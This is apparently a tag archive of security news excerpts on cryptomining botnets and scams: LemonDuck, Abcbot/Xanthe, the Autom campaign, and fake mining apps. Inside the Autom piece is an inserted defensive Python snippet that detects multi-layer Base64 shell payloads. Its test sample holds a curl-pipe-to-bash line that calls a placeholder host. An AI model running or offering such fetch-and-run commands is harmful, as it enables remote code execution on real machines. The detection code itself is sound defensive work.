Tag Archive for: Cryptomining

Cryptomining botnet targeting Docker on Linux systems


LemonDuck, a well-known cryptomining botnet, is targeting Docker on Linux systems to mine cryptocurrency, CrowdStrike has reported.

The vendor’s threat research team revealed in a blog written by Manoj Ahuje that the botnet is leveraging Docker APIs exposed to the internet to run malicious containers on Linux systems.

Docker is used to build, run, and manage containerised workloads. Since it runs primarily in the cloud, a misconfigured instance can expose a Docker API to the internet, where a threat actor can exploit it to run a crypto miner inside a rogue container.

Docker containers a soft target

Mike Parkin, an engineer at Vulcan Cyber, a provider of SaaS for enterprise cyber risk remediation, explains that one of the main ways attackers compromise containerised environments is through misconfigurations, which just shows how many organisations are failing to follow industry best practices.

“There are tools available that can protect these environments from unauthorised use, and workload monitoring tools that can flag unusual activity,” he said in an interview. “The challenge can be coordinating between the development teams and the security teams, but there are risk management tools that can handle that as well.”

Ratan Tipirneni, president and CEO of Tigera, a provider of security and observability for containers, Kubernetes, and cloud, added that while Docker provides a high degree of programmability, flexibility, and automation it has an unintended side effect of increasing the attack surface.

“This is especially true as container technologies get adopted more broadly by the mainstream market,” he said in an interview. “This creates a soft target for adversaries to compromise Docker, since it unlocks a lot of compute power for cryptomining.”

How LemonDuck works

After running its malicious container on an exposed API, LemonDuck downloads an image file named core.png disguised as a bash script, Ahuje explained. Core.png acts as a pivot point for setting up a Linux…

Abcbot Botnet Linked to Operators of Xanthe Cryptomining malware


New research into the infrastructure behind an emerging DDoS botnet named Abcbot has uncovered links with a cryptocurrency-mining botnet attack that came to light in December 2020.

Attacks involving Abcbot, first disclosed by Qihoo 360’s Netlab security team in November 2021, are triggered via a malicious shell script that targets insecure cloud instances operated by cloud service providers such as Huawei, Tencent, Baidu, and Alibaba Cloud. The script downloads malware that co-opts the machine into a botnet, but not before terminating processes belonging to competing threat actors and establishing persistence.

The shell script in question is itself an iteration of an earlier version originally discovered by Trend Micro in October 2021 hitting vulnerable ECS instances inside Huawei Cloud.

But in an interesting twist, continued analysis of the botnet by mapping all known Indicators of Compromise (IoCs), including IP addresses, URLs, and samples, has revealed Abcbot’s code and feature-level similarities to that of a cryptocurrency mining operation dubbed Xanthe that exploited incorrectly-configured Docker implementations to propagate the infection.

“The same threat actor is responsible for both Xanthe and Abcbot and is shifting its objective from mining cryptocurrency on compromised hosts to activities more traditionally associated with botnets, such as DDoS attacks,” Cado Security’s Matt Muir said in a report shared with The Hacker News.

The semantic overlaps between the two malware families range from how the source code is formatted to the names given to the routines, with some functions not only sporting identical names and implementation (e.g., “nameservercheck”) but also having the word “go” appended to the end of the function names (e.g., “filerungo”).

“This could indicate that the Abcbot version of the function has been iterated on several times, with new functionality added at each iteration,” Muir explained.

Furthermore, the deep-dive examination of the malware artifacts revealed the botnet’s capability to create as many as four users of their own by using generic, inconspicuous names like “autoupdater,” “logger,” “sysall,” and “system” to avoid detection, and adding them to the sudoers…

Ongoing Autom Cryptomining Malware Attacks Using Upgraded Evasion Tactics


Cryptomining Campaign

An ongoing crypto mining campaign has upgraded its arsenal while adding new defense evasion tactics that enable the threat actors to conceal the intrusions and fly under the radar, new research published today has revealed.

Since first detected in 2019, a total of 84 attacks against its honeypot servers have been recorded to date, four of which transpired in 2021, according to researchers from DevSecOps and cloud security firm Aqua Security, who have been tracking the malware operation for the past three years. That said, 125 attacks have been spotted in the wild in the third quarter of 2021 alone, signaling that the attacks have not slowed down.

Initial attacks involved executing a malicious command upon running a vanilla image named “alpine:latest” that resulted in the download of a shell script named “autom.sh.”

“Adversaries commonly use vanilla images along with malicious commands to perform their attacks, because most organizations trust the official images and allow their use,” the researchers said in a report shared with The Hacker News. “Over the years, the malicious command that was added to the official image to carry out the attack has barely changed. The main difference is the server from which the shell script autom.sh was downloaded.”

The shell script initiates the attack sequence, enabling the adversary to create a new user account under the name “akay” and upgrade its privileges to a root user, using which arbitrary commands are run on the compromised machine with the goal of mining cryptocurrency.

While early stages of the campaign in 2019 featured no special techniques to hide the mining activity, later versions show the extreme measures its developers have taken to keep it invisible to detection and inspection, chief among them being the ability to disable security mechanisms and retrieve an obfuscated mining shell script that was Base64-encoded five times to get around security tools.
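As an added defender-side example, not code from the Aqua Security report or this article: a small Python routine that peels nested Base64 layers of the kind described above and flags a blob that only turns into a shell script after several rounds of decoding. The sample script, host and file name are constructed placeholders.

```python
import base64
import re

# Constructed sample: a dropper-style script to wrap in Base64 layers; host and path are placeholders.
SAMPLE_SCRIPT = b"""#!/bin/bash
# constructed sample for exercising the detector
curl -s http://example.invalid/stage2.sh | bash
"""

# Tokens suggesting a decoded payload is a shell script rather than other data.
_SHELL_HINTS = re.compile(rb"(^#!\s*/bin/(ba)?sh|\bcurl\b|\bwget\b|\bchmod\b|\bcrontab\b)", re.M)
def wrap_base64(data: bytes, times: int) -> bytes:
    """Base64-encode `data` repeatedly (used only to build test input)."""
    for _ in range(times):
        data = base64.b64encode(data)
    return data

def _try_b64(data: bytes):
    """Return decoded bytes if `data` is a clean Base64 blob, else None."""
    stripped = b"".join(data.split())  # tolerate line-wrapped dumps
    if not stripped or len(stripped) % 4 or not re.fullmatch(rb"[A-Za-z0-9+/]+=*", stripped):
        return None
    try:
        return base64.b64decode(stripped, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def peel_base64(blob: bytes, max_layers: int = 16):
    """Decode repeatedly until a layer stops decoding cleanly; return (layers, payload)."""
    layers = 0
    while layers < max_layers:
        decoded = _try_b64(blob)
        if decoded is None:
            break
        blob, layers = decoded, layers + 1
    return layers, blob

def looks_like_shell(payload: bytes) -> bool:
    """True if the payload is valid text carrying shell-script markers."""
    try:
        payload.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return _SHELL_HINTS.search(payload) is not None

def classify(blob: bytes, min_layers: int = 2) -> dict:
    """Flag blobs that only become a shell script after >= min_layers of decoding."""
    layers, payload = peel_base64(blob)
    shell = looks_like_shell(payload)
    return {"layers": layers, "shell": shell, "suspicious": shell and layers >= min_layers}
```

A plain script scores zero layers and is not flagged; the same script wrapped five times is reported with its layer count, which is the signal worth alerting on.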

Malware campaigns carried out to hijack computers to mine cryptocurrencies have been dominated by multiple threat actors such as Kinsing, which has been found scanning the internet for misconfigured Docker servers to break into the unprotected hosts and install a previously…

Fake Cryptomining Apps Stole Over $350K From Android Users


Cryptomining has become a lucrative industry, growing more and more mainstream. Now, attackers are trying to grab a bit of that cash with apps that claim to automate it. But when downloaded, the apps don’t do anything except take your money. 

Lookout found that a total of 172 apps, including 25 on Google Play, promised users cloud-based cryptomining services for a fee. In truth, those apps never delivered those services.

Take a look at how these apps succeeded in stealing over $350,000 from nearly 100,000 victims.

Inside the BitScam and CloudScam Apps

Lookout did a deep dive into two types of apps, which they sorted into the BitScam and CloudScam families. All of these used a similar code base and design as one another despite advertising different cryptomining operations.

“They are simply shells to collect money for services that don’t exist,” Lookout reported. 

Lookout’s researchers observed that whoever had created the BitScam apps had done so using a framework that didn’t require programming experience. Both app families asked users to pay for cryptomining subscriptions and services through Google Play’s in-app billing system. BitScam also allowed users to pay using bitcoin and Ethereum.

Once installed, the apps loaded a dashboard that displayed a fake hash mining rate as well as the amount of coins that the users had supposedly earned. They also informed users that they could increase their hash mining rate by purchasing other services or subscription upgrades.

It was all a ruse, of course. The in-app updates did nothing to change the mining ‘rate’ either.

What’s more, the apps prevented users from withdrawing any of their mined ‘coins’. The programs displayed a message saying that the withdrawal was pending, but in the background, the apps reset the user’s coin balance to zero.

Other Fake Cryptomining Apps

While cryptocurrency is in the public eye more now than when it began, this kind of app has been around for years. Back in 2018, for instance, security researcher Lukas Stefanko discovered four apps that all impersonated cryptocurrency services. They leveraged that guise to steal users’ cryptocurrency wallet…
